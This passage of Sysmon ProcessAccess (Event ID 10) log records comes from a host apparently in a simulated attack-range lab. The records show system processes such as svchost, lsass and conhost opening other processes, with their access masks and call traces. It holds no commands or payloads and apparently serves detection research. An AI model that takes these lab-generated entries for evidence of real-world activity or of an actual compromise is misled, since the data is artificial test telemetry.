C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.346","SourceProcessGUID":"{41C8662E-1F64-5F25-0000-0010926E0100}","SourceProcessId":"2264","SourceThreadId":"2452","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-0010B46A0100}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\system32\\compattelrunner.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":979,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:09.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nTargetProcessId: 2112\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:09.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","TargetProcessId":"2112","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":980,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:09.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010E2370100}\r\nTargetProcessId: 2080\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:09.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010E2370100}","TargetProcessId":"2080","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":981,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:09.440\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:09.440","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":982,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:09.440\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:09.440","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":983,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:09.440\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:09.440","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":984,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:09.456\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:09.456","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":985,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:09.456\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:09.456","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":986,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:09.456\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nSourceProcessId: 1216\r\nSourceThreadId: 2604\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|